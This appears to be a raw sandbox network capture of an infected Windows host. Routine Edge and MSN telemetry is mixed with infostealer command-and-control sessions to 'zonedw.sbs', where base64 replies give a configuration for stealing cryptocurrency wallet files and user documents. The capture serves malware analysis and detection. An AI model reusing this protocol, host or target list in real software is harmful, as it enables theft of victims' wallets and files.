41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:45 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:47 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.7	50334	51.132.193.105	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:46 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734119253182&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3782 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=27D5836E84FB6FA100DF963A85896E2B; _EDGE_S=F=1&SID=189B3437E698653C251B2163E7526413; _EDGE_V=1
2024-12-13 17:58:46 UTC	3782	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 33 54 31 39 3a 34 37 3a 33 33 2e 31 37 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 31 34 64 33 61 66 32 2d 37 63 64 37 2d 34 38 64 63 2d 39 63 32 31 2d 66 35 31 30 38 66 36 31 63 38 31 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 33 36 37 39 30 32 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-13T19:47:33.178Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"414d3af2-7cd7-48dc-9c21-f5108f61c81c","epoch":"1436790217"},"app":{"locale
2024-12-13 17:58:47 UTC	894	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=7d919f344bfc469a9c5e95b6ab7cda2d&HASH=7d91&LV=202412&V=4&LU=1734112727212; Domain=.microsoft.com; Expires=Sat, 13 Dec 2025 17:58:47 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=38afb72253af42139bc549447db4931a; Domain=.microsoft.com; Expires=Fri, 13 Dec 2024 18:28:47 GMT; Path=/;Secure; SameSite=None time-delta-millis: -6525970 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 13 Dec 2024 17:58:46 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.7	50336	3.171.139.32	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:47 UTC	1012	OUT	GET /b2?rn=1734119253184&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=27D5836E84FB6FA100DF963A85896E2B&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=1F4cc13a9a06a09cf3ed6e51734112725; XID=1F4cc13a9a06a09cf3ed6e51734112725
2024-12-13 17:58:47 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Fri, 13 Dec 2024 17:58:47 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 97713e58966a50f0173f1cdb4e67aea0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK52-P8 X-Amz-Cf-Id: 8KgEKffUqkoUGGKkd7ZlpYZJ8D7Qxc3K6fXtb9r7X7zK6ICheA5dig==

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.7	50337	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:47 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----LNY58Q9RQIE3E3OP8QIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:47 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 4e 59 35 38 51 39 52 51 49 45 33 45 33 4f 50 38 51 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 59 35 38 51 39 52 51 49 45 33 45 33 4f 50 38 51 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 59 35 38 51 39 52 51 49 45 33 45 33 4f 50 38 51 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------LNY58Q9RQIE3E3OP8QIEContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------LNY58Q9RQIE3E3OP8QIEContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------LNY58Q9RQIE3E3OP8QIECont
2024-12-13 17:58:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:47 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.7	50342	20.110.205.119	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:47 UTC	1261	OUT	GET /c.gif?rnd=1734119253183&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5ff571afa9e8406fa25abf234ff9d93b&activityId=5ff571afa9e8406fa25abf234ff9d93b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=BEF20EC394EF4A05A49DA5FBE8E211E1&MUID=27D5836E84FB6FA100DF963A85896E2B HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=27D5836E84FB6FA100DF963A85896E2B; _EDGE_S=F=1&SID=189B3437E698653C251B2163E7526413; _EDGE_V=1; SM=T
2024-12-13 17:58:48 UTC	982	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT Accept-Ranges: bytes ETag: "9270eb7934bdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=27D5836E84FB6FA100DF963A85896E2B; domain=.msn.com; expires=Wed, 07-Jan-2026 17:58:48 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=27D5836E84FB6FA100DF963A85896E2B; domain=c.msn.com; expires=Wed, 07-Jan-2026 17:58:48 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 20-Dec-2024 17:58:48 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 13-Dec-2024 18:08:48 GMT; path=/; SameSite=None; Secure; Date: Fri, 13 Dec 2024 17:58:47 GMT Connection: close Content-Length: 42
2024-12-13 17:58:48 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.7	50346	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:49 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BSRIEKXT2VAIEUSR9RQ9 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:49 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 53 52 49 45 4b 58 54 32 56 41 49 45 55 53 52 39 52 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 42 53 52 49 45 4b 58 54 32 56 41 49 45 55 53 52 39 52 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 53 52 49 45 4b 58 54 32 56 41 49 45 55 53 52 39 52 51 39 0d 0a 43 6f 6e 74 Data Ascii: ------BSRIEKXT2VAIEUSR9RQ9Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------BSRIEKXT2VAIEUSR9RQ9Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------BSRIEKXT2VAIEUSR9RQ9Cont
2024-12-13 17:58:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:50 UTC	536	IN	Data Raw: 32 30 63 0d 0a 5a 47 6c 7a 66 43 56 45 55 6b 6c 57 52 56 39 47 53 56 68 46 52 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 63 6d 56 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 64 58 4e 38 4a 56 56 54 52 56 4a 51 55 6b 39 47 53 55 78 46 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 71 63 47 63 73 4b 69 35 71 63 47 56 6e 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 5a 57 5a 68 64 57 78 30 66 43 56 45 54 30 4e 56 54 55 Data Ascii: 20cZGlzfCVEUklWRV9GSVhFRCVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8cmV8JURSSVZFX1JFTU9WQUJMRSVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8dXN8JVVTRVJQUk9GSUxFJVx8Ki50eHQsKi5qcGcsKi5qcGVnfDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTU

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.7	50347	142.251.40.225	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:50 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-13 17:58:50 UTC	569	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 154477 X-GUploader-UploadID: AFiumC6kJHR1FjLV_4GzsbUnxmxegqGpd6GG4JcJKF2z4cu22tZh4bKoZ0rlHmoatO-5UYIV5fwT2Bc X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Fri, 13 Dec 2024 15:58:13 GMT Expires: Sat, 13 Dec 2025 15:58:13 GMT Cache-Control: public, max-age=31536000 Age: 7237 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-13 17:58:50 UTC	821	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-12-13 17:58:50 UTC	1390	IN	Data Raw: b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr
